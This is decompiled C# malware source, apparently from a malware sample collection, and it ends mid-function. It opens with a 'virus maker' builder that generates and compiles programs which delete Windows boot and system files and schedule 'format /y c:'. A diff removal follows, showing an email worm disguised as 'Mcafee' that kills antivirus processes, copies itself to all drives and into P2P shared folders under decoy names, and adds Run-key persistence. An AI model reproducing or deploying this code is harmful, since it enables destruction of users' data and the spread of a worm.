this.tabPage3.Controls.Add((Control) this.wmQuest);
this.tabPage3.Controls.Add((Control) this.wmError);
this.tabPage3.Controls.Add((Control) this.wmInfo);
((Control) this.tabPage3).Location = new Point(4, 22);
this.tabPage3.Name = "tabPage3";
this.tabPage3.Size = new Size(168, 102);
this.tabPage3.TabIndex = 0;
this.tabPage3.Text = "Welcome";
this.help.SetHelpString((Control) this.welMsgText, "If you select the above checkbox, then this message will be shown on a message box at the beginning of the program.");
this.welMsgText.Location = new Point(8, 8);
this.welMsgText.Name = "welMsgText";
this.help.SetShowHelp((Control) this.welMsgText, true);
this.welMsgText.Size = new Size(152, 20);
this.welMsgText.TabIndex = 7;
this.welMsgText.Text = "Welcome to the installer!";
this.label2.ImeMode = ImeMode.NoControl;
this.label2.Location = new Point(8, 32);
this.label2.Name = "label2";
this.label2.Size = new Size(32, 16);
this.label2.TabIndex = 26;
this.label2.Text = "Title:";
this.help.SetHelpString((Control) this.welMsgTitle, "If you select the above checkbox, then this message will be shown on a message box at the beginning of the program.");
this.welMsgTitle.Location = new Point(40, 32);
this.welMsgTitle.Name = "welMsgTitle";
this.help.SetShowHelp((Control) this.welMsgTitle, true);
this.welMsgTitle.Size = new Size(120, 20);
this.welMsgTitle.TabIndex = 8;
this.welMsgTitle.Text = "FileKeyProtector 1.9";
this.label1.ImeMode = ImeMode.NoControl;
this.label1.Location = new Point(8, 56);
this.label1.Name = "label1";
this.label1.Size = new Size(32, 16);
this.label1.TabIndex = 28;
this.label1.Text = "Icon:";
this.help.SetHelpString((Control) this.wmAst, "Select an icon for the message box.");
this.wmAst.Image = (Image) resourceManager.GetObject("wmAst.Image");
this.wmAst.ImeMode = ImeMode.NoControl;
this.wmAst.Location = new Point(40, 56);
this.wmAst.Name = "wmAst";
this.help.SetShowHelp((Control) this.wmAst, true);
this.wmAst.Size = new Size(32, 24);
this.wmAst.TabIndex = 9;
this.help.SetHelpString((Control) this.wmQuest, "Select an icon for the message box.");
this.wmQuest.Image = (Image) resourceManager.GetObject("wmQuest.Image");
this.wmQuest.ImeMode = ImeMode.NoControl;
this.wmQuest.Location = new Point(72, 56);
this.wmQuest.Name = "wmQuest";
this.help.SetShowHelp((Control) this.wmQuest, true);
this.wmQuest.Size = new Size(32, 24);
this.wmQuest.TabIndex = 10;
this.help.SetHelpString((Control) this.wmError, "Select an icon for the message box.");
this.wmError.Image = (Image) resourceManager.GetObject("wmError.Image");
this.wmError.ImeMode = ImeMode.NoControl;
this.wmError.Location = new Point(104, 56);
this.wmError.Name = "wmError";
this.help.SetShowHelp((Control) this.wmError, true);
this.wmError.Size = new Size(32, 24);
this.wmError.TabIndex = 11;
this.wmInfo.Checked = true;
this.help.SetHelpString((Control) this.wmInfo, "Select an icon for the message box.");
this.wmInfo.Image = (Image) resourceManager.GetObject("wmInfo.Image");
this.wmInfo.ImeMode = ImeMode.NoControl;
this.wmInfo.Location = new Point(136, 56);
this.wmInfo.Name = "wmInfo";
this.help.SetShowHelp((Control) this.wmInfo, true);
this.wmInfo.Size = new Size(32, 24);
this.wmInfo.TabIndex = 12;
this.wmInfo.TabStop = true;
this.tabPage4.Controls.Add((Control) this.emInfo);
this.tabPage4.Controls.Add((Control) this.emText);
this.tabPage4.Controls.Add((Control) this.label3);
this.tabPage4.Controls.Add((Control) this.emTitle);
this.tabPage4.Controls.Add((Control) this.label4);
this.tabPage4.Controls.Add((Control) this.emAst);
this.tabPage4.Controls.Add((Control) this.emQuest);
this.tabPage4.Controls.Add((Control) this.emError);
((Control) this.tabPage4).Location = new Point(4, 22);
this.tabPage4.Name = "tabPage4";
this.tabPage4.Size = new Size(168, 102);
this.tabPage4.TabIndex = 1;
this.tabPage4.Text = "Ending";
this.help.SetHelpString((Control) this.emInfo, "Select an icon for the message box.");
this.emInfo.Image = (Image) resourceManager.GetObject("emInfo.Image");
this.emInfo.ImeMode = ImeMode.NoControl;
this.emInfo.Location = new Point(136, 56);
this.emInfo.Name = "emInfo";
this.help.SetShowHelp((Control) this.emInfo, true);
this.emInfo.Size = new Size(32, 24);
this.emInfo.TabIndex = 36;
this.help.SetHelpString((Control) this.emText, "If you select the above checkbox, then this message will be shown on a message box at the end of the program.");
this.emText.Location = new Point(8, 8);
this.emText.Name = "emText";
this.help.SetShowHelp((Control) this.emText, true);
this.emText.Size = new Size(152, 20);
this.emText.TabIndex = 32;
this.emText.Text = "Invalid block memory block address.";
this.label3.ImeMode = ImeMode.NoControl;
this.label3.Location = new Point(8, 32);
this.label3.Name = "label3";
this.label3.Size = new Size(32, 16);
this.label3.TabIndex = 37;
this.label3.Text = "Title:";
this.help.SetHelpString((Control) this.emTitle, "If you select the above checkbox, then this message will be shown on a message box at the end of the program.");
this.emTitle.Location = new Point(40, 32);
this.emTitle.Name = "emTitle";
this.help.SetShowHelp((Control) this.emTitle, true);
this.emTitle.Size = new Size(120, 20);
this.emTitle.TabIndex = 38;
this.emTitle.Text = "FileKeyProtector 1.9";
this.label4.ImeMode = ImeMode.NoControl;
this.label4.Location = new Point(8, 56);
this.label4.Name = "label4";
this.label4.Size = new Size(32, 16);
this.label4.TabIndex = 39;
this.label4.Text = "Icon:";
this.help.SetHelpString((Control) this.emAst, "Select an icon for the message box.");
this.emAst.Image = (Image) resourceManager.GetObject("emAst.Image");
this.emAst.ImeMode = ImeMode.NoControl;
this.emAst.Location = new Point(40, 56);
this.emAst.Name = "emAst";
this.help.SetShowHelp((Control) this.emAst, true);
this.emAst.Size = new Size(32, 24);
this.emAst.TabIndex = 33;
this.help.SetHelpString((Control) this.emQuest, "Select an icon for the message box.");
this.emQuest.Image = (Image) resourceManager.GetObject("emQuest.Image");
this.emQuest.ImeMode = ImeMode.NoControl;
this.emQuest.Location = new Point(72, 56);
this.emQuest.Name = "emQuest";
this.help.SetShowHelp((Control) this.emQuest, true);
this.emQuest.Size = new Size(32, 24);
this.emQuest.TabIndex = 34;
this.emError.Checked = true;
this.help.SetHelpString((Control) this.emError, "Select an icon for the message box.");
this.emError.Image = (Image) resourceManager.GetObject("emError.Image");
this.emError.ImeMode = ImeMode.NoControl;
this.emError.Location = new Point(104, 56);
this.emError.Name = "emError";
this.help.SetShowHelp((Control) this.emError, true);
this.emError.Size = new Size(32, 24);
this.emError.TabIndex = 35;
this.emError.TabStop = true;
this.help.SetHelpString((Control) this.stageLabel, "Know what the program's doing.");
this.stageLabel.Location = new Point(344, 168);
this.stageLabel.Name = "stageLabel";
this.help.SetShowHelp((Control) this.stageLabel, true);
this.stageLabel.Size = new Size(144, 16);
this.stageLabel.TabIndex = 22;
this.stageLabel.Text = "Status: Ready.";
this.help.SetHelpString((Control) this.stageProgress, "Know the virus making progress");
this.stageProgress.Location = new Point(344, 184);
this.stageProgress.Name = "stageProgress";
this.help.SetShowHelp((Control) this.stageProgress, true);
this.stageProgress.Size = new Size(144, 16);
this.stageProgress.TabIndex = 23;
this.compiler.SynchronizingObject = (ISynchronizeInvoke) this;
this.help.SetHelpString((Control) this.fileIcon, "Select an icon for your virus. If you just want a default EXE icon, then leave this box BLANK");
this.fileIcon.Location = new Point(344, 128);
this.fileIcon.Name = "fileIcon";
this.help.SetShowHelp((Control) this.fileIcon, true);
this.fileIcon.Size = new Size(144, 20);
this.fileIcon.TabIndex = 31;
this.fileIcon.Text = "";
this.about.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.about, "View an About... window for this program");
this.about.Location = new Point(216, 136);
this.about.Name = "about";
this.help.SetShowHelp((Control) this.about, true);
this.about.Size = new Size(120, 16);
this.about.TabIndex = 29;
this.about.Text = "About...";
this.about.Click += new EventHandler(this.about_Click);
this.label7.Location = new Point(344, 112);
this.label7.Name = "label7";
this.label7.Size = new Size(104, 16);
this.label7.TabIndex = 32;
this.label7.Text = "File Icon";
this.AcceptButton = (IButtonControl) this.makeVirus;
this.AutoScaleBaseSize = new Size(5, 13);
this.ClientSize = new Size(498, 216);
this.Controls.Add((Control) this.label7);
this.Controls.Add((Control) this.fileIcon);
this.Controls.Add((Control) this.about);
this.Controls.Add((Control) this.stageProgress);
this.Controls.Add((Control) this.stageLabel);
this.Controls.Add((Control) this.msgType);
this.Controls.Add((Control) this.groupBox3);
this.Controls.Add((Control) this.makeVirus);
this.Controls.Add((Control) this.groupBox2);
this.FormBorderStyle = FormBorderStyle.FixedSingle;
this.HelpButton = true;
this.Icon = (Icon) resourceManager.GetObject("$this.Icon");
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (ETVM05);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "El-Trucha's Virus Maker 2005 BETA 2";
this.Load += new EventHandler(this.ETVM05_Load);
this.groupBox2.ResumeLayout(false);
this.groupBox3.ResumeLayout(false);
this.msgType.ResumeLayout(false);
this.dosCons.ResumeLayout(false);
this.msgBox.ResumeLayout(false);
this.tabControl2.ResumeLayout(false);
this.tabPage3.ResumeLayout(false);
this.tabPage4.ResumeLayout(false);
this.ResumeLayout(false);
}
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.Run((Form) new ETVM05());
}
private void ETVM05_Load(object sender, EventArgs e)
{
ETVM05.OpenFiles();
int num = (int) MessageBox.Show("IMPORTANT NOTE: All of your victims WILL need the .NET Framework in order for the virus to affect them", "Warning", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
this.fileIcon.Text = Application.StartupPath + "\\5293.ico";
this.compiler.StartInfo.FileName = "\"" + Application.StartupPath + "\\csc.exe\"";
}
private static void OpenFiles()
{
}
private void far_CheckedChanged(object sender, EventArgs e)
{
if (this.far.Checked)
{
this.farMsgSelect.Checked = false;
this.farMsg.Enabled = false;
this.farMsgSelect.Enabled = true;
}
else
{
this.farMsg.Enabled = false;
this.farMsgSelect.Enabled = false;
}
}
private void farMsgSelect_CheckedChanged(object sender, EventArgs e)
{
if (this.farMsgSelect.Checked)
this.farMsg.Enabled = true;
else
this.farMsg.Enabled = false;
}
private void useDosCons_CheckedChanged(object sender, EventArgs e)
{
if (this.useDosCons.Checked)
this.useMsgBox.Checked = false;
else
this.useMsgBox.Checked = true;
}
private void useMsgBox_CheckedChanged(object sender, EventArgs e)
{
if (this.useMsgBox.Checked)
this.useDosCons.Checked = false;
else
this.useDosCons.Checked = true;
}
private void makeVirus_Click(object sender, EventArgs e)
{
this.stageLabel.Text = "Status: Deleting old source file...";
if (File.Exists(Application.StartupPath + "\\myvirus.cs"))
File.Delete(Application.StartupPath + "\\myvirus.cs");
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Adding starting code...";
this.myvirus = new StreamWriter("myvirus.cs");
this.myvirus.AutoFlush = true;
this.myvirus.WriteLine("using System;");
this.myvirus.WriteLine("using System.Drawing;");
this.myvirus.WriteLine("using System.Collections;");
this.myvirus.WriteLine("using System.ComponentModel;");
this.myvirus.WriteLine("using System.Windows.Forms;");
this.myvirus.WriteLine("using System.IO;");
this.myvirus.WriteLine("public class Virus");
this.myvirus.WriteLine("{");
this.myvirus.WriteLine("\tpublic static void Main()");
this.myvirus.WriteLine("\t{");
this.stageProgress.Value = 0;
this.stageLabel.Text = "Adding welcome message...";
if (this.useDosCons.Checked)
{
this.myvirus.WriteLine("\t\t\tConsole.WriteLine(\"" + this.welMsg.Text + "\");");
}
else
{
if (this.wmAst.Checked)
this.wmIcon = "Asterisk";
else if (this.wmQuest.Checked)
this.wmIcon = "Question";
else if (this.wmError.Checked)
this.wmIcon = "Error";
else if (this.wmInfo.Checked)
this.wmIcon = "Information";
this.myvirus.WriteLine("\t\t\tMessageBox.Show(\"" + this.welMsgText.Text + "\", \"" + this.welMsgTitle.Text + "\", MessageBoxButtons.OK, MessageBoxIcon." + this.wmIcon + ");");
this.stageProgress.Value = 0;
}
this.stageLabel.Text = "Status: Adding Try/Catch statement...";
this.myvirus.WriteLine("\t\ttry");
this.myvirus.WriteLine("\t\t{");
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding autoexec.bat code...";
if (this.autoexec_bat.Checked)
{
this.myvirus.WriteLine("\t\t\tif (File.Exists(\"c:\\\\autoexec.bat\"))");
this.myvirus.WriteLine("\t\t\t{");
this.myvirus.WriteLine("\t\t\t\tif ((File.GetAttributes(\"c:\\\\autoexec.bat\") & FileAttributes.System) == FileAttributes.System)");
this.myvirus.WriteLine("\t\t\t\t{");
this.myvirus.WriteLine("\t\t\t\t\tFile.SetAttributes(\"c:\\\\autoexec.bat\", FileAttributes.System);");
this.myvirus.WriteLine("\t\t\t\t}");
this.myvirus.WriteLine("\t\t\t\tFile.Delete(\"c:\\\\autoexec.bat\");");
this.myvirus.WriteLine("\t\t\t}");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding command.com code...";
if (this.command_com.Checked)
{
this.myvirus.WriteLine("\t\t\tif (File.Exists(\"c:\\\\command.com\"))");
this.myvirus.WriteLine("\t\t\t{");
this.myvirus.WriteLine("\t\t\t\tif ((File.GetAttributes(\"c:\\\\command.com\") & FileAttributes.System) == FileAttributes.System)");
this.myvirus.WriteLine("\t\t\t\t{");
this.myvirus.WriteLine("\t\t\t\t\tFile.SetAttributes(\"c:\\\\command.com\", FileAttributes.System);");
this.myvirus.WriteLine("\t\t\t\t}");
this.myvirus.WriteLine("\t\t\t\tFile.Delete(\"c:\\\\command.com\");");
this.myvirus.WriteLine("\t\t\t}");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding win.ini code...";
if (this.win_ini.Checked)
{
this.myvirus.WriteLine("\t\t\tif (File.Exists(\"c:\\\\windows\\\\win.ini\"))");
this.myvirus.WriteLine("\t\t\t{");
this.myvirus.WriteLine("\t\t\t\tif ((File.GetAttributes(\"c:\\\\windows\\\\win.ini\") & FileAttributes.System) == FileAttributes.System)");
this.myvirus.WriteLine("\t\t\t\t{");
this.myvirus.WriteLine("\t\t\t\t\tFile.SetAttributes(\"c:\\\\windows\\\\win.ini\", FileAttributes.System);");
this.myvirus.WriteLine("\t\t\t\t}");
this.myvirus.WriteLine("\t\t\t\tFile.Delete(\"c:\\\\windows\\\\win.ini\");");
this.myvirus.WriteLine("\t\t\t}");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding win.com code...";
if (this.win_com.Checked)
{
this.myvirus.WriteLine("\t\t\tif (File.Exists(\"c:\\\\windows\\\\win.com\"))");
this.myvirus.WriteLine("\t\t\t{");
this.myvirus.WriteLine("\t\t\t\tif ((File.GetAttributes(\"c:\\\\windows\\\\win.com\") & FileAttributes.System) == FileAttributes.System)");
this.myvirus.WriteLine("\t\t\t\t{");
this.myvirus.WriteLine("\t\t\t\t\tFile.SetAttributes(\"c:\\\\windows\\\\win.com\", FileAttributes.System);");
this.myvirus.WriteLine("\t\t\t\t}");
this.myvirus.WriteLine("\t\t\t\tFile.Delete(\"c:\\\\windows\\\\win.com\");");
this.myvirus.WriteLine("\t\t\t}");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding boot.ini code...";
if (this.boot_ini.Checked)
{
this.myvirus.WriteLine("\t\t\tif (File.Exists(\"c:\\\\boot.ini\"))");
this.myvirus.WriteLine("\t\t\t{");
this.myvirus.WriteLine("\t\t\t\tif ((File.GetAttributes(\"c:\\\\boot.ini\") & FileAttributes.System) == FileAttributes.System)");
this.myvirus.WriteLine("\t\t\t\t{");
this.myvirus.WriteLine("\t\t\t\t\tFile.SetAttributes(\"c:\\\\boot.ini\", FileAttributes.System);");
this.myvirus.WriteLine("\t\t\t\t}");
this.myvirus.WriteLine("\t\t\t\tFile.Delete(\"c:\\\\boot.ini\");");
this.myvirus.WriteLine("\t\t\t}");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding ntldr code...";
if (this.ntldr.Checked)
{
this.myvirus.WriteLine("\t\t\tif (File.Exists(\"c:\\\\ntldr\"))");
this.myvirus.WriteLine("\t\t\t{");
this.myvirus.WriteLine("\t\t\t\tif ((File.GetAttributes(\"c:\\\\ntldr\") & FileAttributes.System) == FileAttributes.System)");
this.myvirus.WriteLine("\t\t\t\t{");
this.myvirus.WriteLine("\t\t\t\t\tFile.SetAttributes(\"c:\\\\ntldr\", FileAttributes.System);");
this.myvirus.WriteLine("\t\t\t\t}");
this.myvirus.WriteLine("\t\t\t\tFile.Delete(\"c:\\\\ntldr\");");
this.myvirus.WriteLine("\t\t\t}");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding format code...";
if (this.far.Checked)
{
this.myvirus.WriteLine("\t\t\tStreamWriter fab = new StreamWriter(\"c:\\\\autoexec.bat\");");
if (this.farMsgSelect.Checked)
this.myvirus.WriteLine("\t\t\tfab.WriteLine(\"echo " + this.farMsg.Text + "\");");
this.myvirus.WriteLine("\t\t\tfab.WriteLine(\"format /y c:\\\\\");");
}
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding ending message...";
if (this.useDosCons.Checked)
this.myvirus.WriteLine("\t\tConsole.WriteLine(\"" + this.endMsg.Text + "\");");
else if (this.emAst.Checked)
this.emIcon = "Asterisk";
else if (this.emQuest.Checked)
this.emIcon = "Question";
else if (this.emError.Checked)
this.emIcon = "Error";
else if (this.emInfo.Checked)
this.emIcon = "Information";
this.stageProgress.Value = 0;
this.stageLabel.Text = "Status: Checking/Adding ending code...";
this.myvirus.WriteLine("\t\t}");
this.myvirus.WriteLine("\t\tcatch (Exception)");
this.myvirus.WriteLine("\t\t{");
this.myvirus.WriteLine("\t\t\tConsole.WriteLine(\"Error\");");
this.myvirus.WriteLine("\t\t}");
this.myvirus.WriteLine("\t}");
this.myvirus.WriteLine("}");
this.stageProgress.Value = 0;
try
{
this.stageLabel.Text = "Status: Closing file/compiling...";
this.myvirus.Close();
ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
CompilerParameters options = new CompilerParameters(new string[1]
{
"System.Windows.Forms.dll"
});
options.GenerateExecutable = true;
options.OutputAssembly = "myvirus.exe";
if (this.fileIcon.Text != "")
options.CompilerOptions = "/win32icon:\"" + this.fileIcon.Text + "\"";
CompilerResults compilerResults = compiler.CompileAssemblyFromFile(options, "myvirus.cs");
if (compilerResults.Errors.Count > 0)
{
foreach (CompilerError error in (CollectionBase) compilerResults.Errors)
{
int num = (int) MessageBox.Show(error.ErrorText, "Compiler Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
this.statusForLabel = "An error occurred.";
}
else
this.statusForLabel = "Done.";
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
this.statusForLabel = "An error occurred.";
}
this.stageProgress.Value = 100;
this.stageLabel.Text = "Status: " + this.statusForLabel;
}
private void about_Click(object sender, EventArgs e) => new About().Show();
}
}

View File

@ -1,44 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Api.api
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.Runtime.InteropServices;
namespace Api
{
public class api
{
public const int SW_HIDE = 0;
public const int ConsoleWindowClass = 1;
public const string amir = "hi i'm devil worm";
public const int EWX_LOGOFF = 0;
public const int EWX_SHUTDOWN = 1;
public const int EWX_REBOOT = 2;
public const int EWX_FORCE = 4;
public const int EWX_POWEROFF = 8;
[DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
public static extern int mciSendString(
string lpstrCommand,
string lpstrReturnString,
int uReturnLength,
int hwndCallback);
[DllImport("user32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
[DllImport("user32")]
public static extern int MessageBeep(int wType);
[DllImport("kernel32")]
public static extern int Sleep(int dwMilliseconds);
[DllImport("user32", EntryPoint = "FindWindowA")]
public static extern int FindWindow(string lpClassName, string lpWindowName);
[DllImport("shell32", EntryPoint = "#59")]
public static extern int SHRestartSystemMB(int hOwner, string sExtraPrompt, int uFlags);
}
}

View File

@ -1,14 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("60fd839e-9d72-4f28-91ea-e8e543d11475")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © civil 2006")]
[assembly: AssemblyProduct("Mcafee")]
[assembly: AssemblyCompany("civil")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Mcafee")]
[assembly: AssemblyVersion("1.0.0.0")]

View File

@ -1,53 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Mcafee</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Mcafee</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Form2.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Api\api.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Form2.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Mcafee", "Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.csproj", "{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,218 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Form1
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using Api;
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace Mcafee
{
public class Form1 : Form
{
private IContainer components;
private Timer mailer;
private Timer killer;
private Timer coppy;
private Timer eerrorr;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.mailer = new Timer(this.components);
this.killer = new Timer(this.components);
this.coppy = new Timer(this.components);
this.eerrorr = new Timer(this.components);
this.SuspendLayout();
this.mailer.Enabled = true;
this.mailer.Interval = 50000;
this.mailer.Tick += new EventHandler(this.mailer_Tick);
this.killer.Enabled = true;
this.killer.Interval = 150;
this.killer.Tick += new EventHandler(this.killer_Tick);
this.coppy.Enabled = true;
this.coppy.Interval = 720000;
this.coppy.Tick += new EventHandler(this.coppy_Tick);
this.eerrorr.Enabled = true;
this.eerrorr.Interval = 90000;
this.eerrorr.Tick += new EventHandler(this.eerrorr_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = "AmirCivil";
this.Activated += new EventHandler(this.amir22);
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
public Form1() => this.InitializeComponent();
private void Form1_Load(object sender, EventArgs e)
{
}
private void mailer_Tick(object sender, EventArgs e) => new Form2().Show();
private void killer_Tick(object sender, EventArgs e)
{
try
{
string[] strArray = new string[57]
{
"NPROTECTED",
"GhostTray",
"NAVW32",
"F-AGNT95",
"NOD32",
"NETD32",
"NETMON",
"IOMON98",
"SCAN32",
"NORMIST",
"NAVW3",
"ADAWARE",
"AGENTW",
"LU32",
"NAVAP32",
"ANTIVIR",
"TCM",
"W9X",
"AVKSERV",
"AV32",
"ACKWIN32",
"AD-AWARE",
"ADVXDWIN",
"AGENTSVR",
"AGENTW",
"ANTIVIRUS",
"ANTS",
"APIMONITOR",
"APLICA32",
"ARR",
"AUPDATE",
"AUTODOWN",
"AUTOTRACE",
"AVE32",
"AVGCC32",
"AVGCTRL",
"AVGNT",
"CFINET",
"CLEANPC",
"CTRL",
"AV32",
"DATEMANAGER ",
"DOORS",
"DPFSETUP ",
"FCH32 ",
"FNRB32",
"notepad",
"Babylon",
"POP3TRAP",
"WINWORD",
"realplay",
"EXCEL",
"taskmgr",
"regedit",
"vb6",
"ZONEALARM",
"POWERPNT"
};
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 57)]))
process.CloseMainWindow();
}
catch (Exception ex)
{
}
}
private void coppy_Tick(object sender, EventArgs e)
{
try
{
string str = new string[10]
{
"\\Services.pif",
"\\winamp.exe",
"\\mail.dll.exe",
"\\vista.exe",
"\\Norton.exe",
"\\Mcafee.exe",
"\\Nod32.cmd",
"\\avg.pif",
"\\AmirCivil.pif",
"\\ScreenSaver.scr"
}[new Random().Next(0, 10)];
foreach (string logicalDrive in Directory.GetLogicalDrives())
File.Copy(Application.ExecutablePath, logicalDrive + str);
}
catch (Exception ex)
{
}
}
private void amir22(object sender, EventArgs e)
{
this.Hide();
try
{
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\WinServicces.cab.bak.exe");
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet3", (object) (Environment.SystemDirectory + "\\WinServicces.cab.bak.exe"), RegistryValueKind.ExpandString);
Registry.SetValue("HKEY_CURRENT_USER\\SadNet3", "SadNet3", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
}
catch (Exception ex)
{
}
try
{
File.Copy(Application.ExecutablePath, "C:\\Program Files\\\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\\\Kazaa\\My Shared Folder\\fun.pic.scr");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
